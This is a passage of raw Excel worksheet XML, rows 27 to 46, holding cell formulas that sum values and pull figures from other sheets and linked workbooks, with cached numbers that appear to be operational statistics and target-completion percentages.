        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'3'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]4'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]4'!$X$69</f>
        <v>22.3117848970252</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]4'!$Y$69</f>
        <v>25.3717628987586</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]4'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]4'!$U$69</f>
        <v>6.59375</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]4'!$V$69</f>
        <v>67.6432445759369</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]4'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]4'!$R$69</f>
        <v>6.33</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]4'!$S$69</f>
        <v>5487.22</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'3'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'3'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]4'!$W$104</f>
        <v>28.628230616304</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]4'!$X$104</f>
        <v>28.5442000533675</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]4'!$Y$104</f>
        <v>25.9931820253395</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]4'!$T$104</f>
        <v>100</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]4'!$U$104</f>
        <v>100</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]4'!$V$104</f>
        <v>64.7935157790927</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]4'!$Q$104</f>
        <v>24</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]4'!$R$104</f>
        <v>96</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]4'!$S$104</f>
        <v>5256.05</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'3'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'3'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]4'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]4'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]4'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]4'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]4'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]4'!$V$105</f>
        <v>34.5683185404339</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]4'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]4'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]4'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'3'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'3'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]4'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]4'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]4'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]4'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]4'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]4'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]4'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]4'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]4'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]4'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]4'!$E$16</f>
        <v>3173</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'3'!H31</f>
        <v>12679</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1385686</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]4'!$I$16</f>
        <v>3876.14</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'3'!K31</f>
        <v>18538.34</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1374586.47</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]4'!$L$16</f>
        <v>59570.03</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>79.4267066666667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'[11]4'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]4'!$E$13</f>
        <v>673</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'3'!H32</f>
        <v>2421</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1530264</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]4'!$I$13</f>
        <v>2427</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'3'!K32</f>
        <v>9629</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1031107</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]4'!$L$13</f>
        <v>52562.616</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>105.125232</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]4'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]4'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]4'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]4'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]4'!$U$76</f>
        <v>3.125e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]4'!$V$76</f>
        <v>4.10502958579882e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]4'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]4'!$R$76</f>
        <v>3e-11</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]4'!$S$76</f>
        <v>3.33e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]4'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'3'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]4'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'3'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]4'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]4'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]4'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]4'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]4'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]4'!$U$77</f>
        <v>1.04166666666667e-11</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]4'!$V$77</f>
        <v>62.3745069033545</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]4'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]4'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]4'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]4'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'3'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]4'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'3'!K34</f>
        <v>666.89</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>467869.82</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]4'!$L$15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'[11]4'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'3'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]4'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'3'!K35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G36+'3'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'3'!K36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G37+'3'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'3'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]4'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]4'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]4'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'3'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]4'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'3'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]4'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'3'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'3'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]4'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]4'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]4'!$R$10</f>
        <v>681.96</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'3'!U38</f>
        <v>2708.52</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>261848.24</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]4'!$V$10</f>
        <v>770</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'3'!X38</f>
        <v>3238</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>259345</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]4'!$Y$10</f>
        <v>9115.851</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'3'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'3'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]4'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]4'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]4'!$R$50</f>
        <v>229.14</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'3'!U39</f>
        <v>1195.12</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>80008.719</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]4'!$V$50</f>
        <v>270</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'3'!X39</f>
        <v>998</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>79757</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]4'!$Y$50</f>
        <v>1428.666</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'3'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'3'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]4'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]4'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]4'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]4'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]4'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]4'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]4'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]4'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]4'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]4'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]4'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'3'!H41</f>
        <v>0</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>124976</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]4'!$I$16</f>
        <v>347</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'3'!K41</f>
        <v>1540</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>122933.54</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]4'!$L$16</f>
        <v>24589.76</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>81.9658666666667</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]4'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]4'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]4'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'3'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]4'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'3'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]4'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]4'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]4'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'3'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]4'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'3'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]4'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]4'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]4'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]4'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'3'!U42</f>
        <v>2592.9</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>210179.87</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]4'!$V$8</f>
        <v>169</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'3'!X42</f>
        <v>390</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>202861</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]4'!$Y$8</f>
        <v>10681.736</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]4'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]4'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'3'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]4'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'3'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]4'!$L$14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'[12]4'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'3'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]4'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'3'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]4'!$L$15</f>
        <v>67564.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]4'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]4'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]4'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'3'!U44</f>
        <v>0</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>64753.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]4'!$V$29</f>
        <v>124</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'3'!X44</f>
        <v>512</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>66922</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]4'!$Y$29</f>
        <v>1787.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]4'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'3'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]4'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'3'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]4'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]4'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]4'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]4'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]4'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]4'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]4'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]4'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]4'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'3'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'3'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]4'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]4'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]4'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'3'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]4'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'3'!X46</f>
        <v>0</v>
      </c>
